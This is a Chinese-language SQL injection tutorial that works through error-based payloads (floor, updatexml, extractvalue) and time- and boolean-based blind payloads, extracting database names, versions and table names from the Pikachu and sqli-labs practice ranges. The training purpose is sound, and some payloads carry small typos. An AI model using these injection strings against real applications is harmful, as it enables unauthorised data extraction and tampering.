16 web漏洞,SQL注入之查询方式及报错盲注
? 当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显 的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相 关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其 SQL 语句大概写法也能更好的选择对应的注入语句
data:image/s3,"s3://crabby-images/f85f7/f85f76fdf00c40f2029bd995d6cff7c593af8522" alt="img"
常用sql语句
select 查询数据
在网站应用中进行数据显示查询效果
例: select * from news wher id=$id
insert 插入数据
在网站应用中进行用户注册添加等操作
例:insert into news(id,url,text) values(2,‘x’,’$t’)
delete 删除数据
后台管理里面删除文章删除用户等操作
例:delete from news where id=$id
update 更新数据
会员或后台中心数据同步或缓存等操作
例:update user set pwd=’$p’ where id=2 and username=‘admin’
order by 排列数据
一般结合表名或列名进行数据排序操作
例:select * from news order by $id
例:select id,name,price from news order by $order
重点理解:
我们可以通过以上查询方式与网站应用的关系
注入点产生地方或应用猜测到对方的SQL查询方式
例如:
data:image/s3,"s3://crabby-images/179d5/179d56bc7bbf44c562ba36c481be47d8e6fd534e" alt="请添加图片描述"
注册页面,则为插入数据库的操作
data:image/s3,"s3://crabby-images/aed11/aed114e20e3eb44ba16b9be734860af43c4aa8d8" alt="请添加图片描述"
select查询方式的注入
需要闭合单引号
data:image/s3,"s3://crabby-images/88bb0/88bb0ebf017c38987951765f4fc4d4c135508fc6" alt="请添加图片描述"
insert注入
语句不同,注入的写法不同
SQL注入—盲注
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行半段或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:
基于布尔的SQL盲注-逻辑判断
regexp,like,ascii,left,ord,mid
基于时间的SQL盲注-延时判断
if,sleep
基于报错的SQL盲注-报错回显
floor,updatexml,extractvalue
优先使用报错回显
参考文档:https://www.jianshu.com/p/bc35f8dd4f7c
基于报错的SQL盲注-报错回显
pikachu靶场insert/update注入
insert/update注入
注册进行数据包抓取
data:image/s3,"s3://crabby-images/e3011/e3011e2ba7de2d451f67a529ca9fce67f1d0a7b8" alt="请添加图片描述"
修改username,加一个单引号
data:image/s3,"s3://crabby-images/17cc0/17cc0fc595150aa8f8d1a25016c93689920e610f" alt="请添加图片描述"
报错
通过一般注入语句注入失败
在mysql中验证
data:image/s3,"s3://crabby-images/92089/92089987b7e94e258d784362aa2b1383ca75694a" alt="请添加图片描述"
执行sql语句没有回显,只会显示失败与否
data:image/s3,"s3://crabby-images/ddf2f/ddf2fa9a44387eb6142d05432d0ace9909a6b448" alt="请添加图片描述"
floor语句
username= x’ or(select 1 from(select count(*),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or ’
查询数据库版本
data:image/s3,"s3://crabby-images/ebd62/ebd624865becf2673687ac63cc1c0393cc3f9b3b" alt="请添加图片描述"
查询数据库名
data:image/s3,"s3://crabby-images/09188/09188e1042c0b4485b18e4ed5da7c8d88abf9943" alt="请添加图片描述"
查询用户
data:image/s3,"s3://crabby-images/7504e/7504ee0b93cbe386c6dfacb2f8806133537ec2c2" alt="请添加图片描述"
updatexml语句
语句
username=x’ or updatexml(1,concat(0x7e,(version())),0) or’
爆出版本信息
data:image/s3,"s3://crabby-images/d77cc/d77cce10595227201e141b9b58c5c4fc3924d8b0" alt="请添加图片描述"
extractvalue语句
username=x’ or extractvalue(1,concat(0x7e,database())) or’
data:image/s3,"s3://crabby-images/417c4/417c489a4f60e6dfc87e90ac3c61ad007ef31f51" alt="请添加图片描述"
update注入
data:image/s3,"s3://crabby-images/03c02/03c020d6b4868b59c1891a6f285680dae11d2a9e" alt="请添加图片描述"
也是没有回显的注入
floor语句
*sex=’ or (select 1 from(select count(*),concat(floor(rand(0)2),0x7e, (database()),0x7e)x from information_schema.character_sets group by x)a) or ’
data:image/s3,"s3://crabby-images/0d47c/0d47cbbe9ec5164d7561d05da2da4b04d183db94" alt="请添加图片描述"
updatexml语句
sex=’ or updatexml(1,concat(0x7e,(version())),0) or’
data:image/s3,"s3://crabby-images/74f40/74f40d031da9c4f21f6f5b205327e4a9a27571c0" alt="请添加图片描述"
extractvalue语句
sex=’ or extractvalue(1,concat(0x7e,database())) or '
data:image/s3,"s3://crabby-images/b9aaa/b9aaad15160ef8aa0adfb095cf2f40f22f735063" alt="请添加图片描述"
pikachu靶场delete注入 data:image/s3,"s3://crabby-images/0dbf3/0dbf31850cc99251373865809f22712ba3f398f8" alt="请添加图片描述"
进行留言删除操作,删除则使用了sql语句的delete
删除抓包
data:image/s3,"s3://crabby-images/79fbc/79fbcd33e9f2275c9d2e4c7268d02de2ad934364" alt="请添加图片描述"
进行注入
floor语句
*id=58+or+select+1+from(select+count(*),concat(floor(rand(0)2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a)
data:image/s3,"s3://crabby-images/3a165/3a16585162bd0cbd8a4ca73131bf708893189b80" alt="请添加图片描述"
updatexml语句
id=56+or+updatexml+(1,concat(0x7e,database()),0)
data:image/s3,"s3://crabby-images/d547c/d547ca97995e35a644bedc85c1f4006f5283c02c" alt="请添加图片描述"
extractvalue语句
id=56+or+extractvalue(1,concat(0x7e,database()))
data:image/s3,"s3://crabby-images/fb0ff/fb0ffca5eae3f1b4d007979fd6c5b029a0848811" alt="请添加图片描述"
基于时间的SQL盲注-延时判断
sleep()函数
? 通过在MySQL中执行select sleep(N)可以让此语句运行N秒钟
正常查询所需时间
data:image/s3,"s3://crabby-images/119ef/119ef034bf7ae52a46a9a70154ded1b1c8031506" alt="请添加图片描述"
sleep(1)所需时间
data:image/s3,"s3://crabby-images/a60a6/a60a68c5687f4b05fdae3a8714f5295997c9d251" alt="请添加图片描述"
if()函数
? if(expr1,expr2,expr3),如果expr1的值为true,则返回expr2的值,如果expr1的值为false,
则返回expr3的值。
data:image/s3,"s3://crabby-images/150c8/150c8891b80580e71be99428accd00199ea0b822" alt="请添加图片描述"
sleep(if(database()=“pikachu”,5,0))
如果数据库为pikachu,则延时5s
data:image/s3,"s3://crabby-images/bba32/bba32fb0300430d9f90660db3b1e599a66fc1173" alt="请添加图片描述"
基于布尔的SQL盲注-逻辑判断
sqllibs第二关
?id=1 and sleep(if(database()=‘a’,0,10))
data:image/s3,"s3://crabby-images/efdf6/efdf66c8c3ca0f954be04e2824313322ed830917" alt="请添加图片描述"
加载页面会有10s延迟
一步一步爆破太慢,可以先猜解数据库名长度,然后再一位一位来
?id=1 and sleep(if(length(database())=8,5,0))–+
如果数据库名长度为8,则延迟5s
?id=1 and sleep(if(mid(database(),1,1)=‘s’,5,0))–+
判断数据库名第一位是否是s,是则延迟5S
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)–+
第一个表名的第一位是否为e,是则延迟3S
limit 0,1 控制个数 limit1,1则为第二个表名
参考:
like 'ro%' #判断 ro 或 ro...是否成立
regexp '^xiaodi[a-z]' #匹配 xiaodi 及 xiaodi...等
if(条件,5,0) #条件成立 返回 5 反之 返回 0
sleep(5) #SQL 语句延时执行 5 秒
mid(a,b, c) #从位置 b 开始,截取 a 字符串的第 c 位
substr(a,b,c) #从 b 位置开始,截取字符串 a 的 c 长度
left(database(),1),database() #left(a,b)从左侧截取 a 的前 b 位
length(database())=8 #判断数据库 database()名的长度
ord=ascii ascii(x)=97 #判断 x 的 ascii 码是否等于 97
|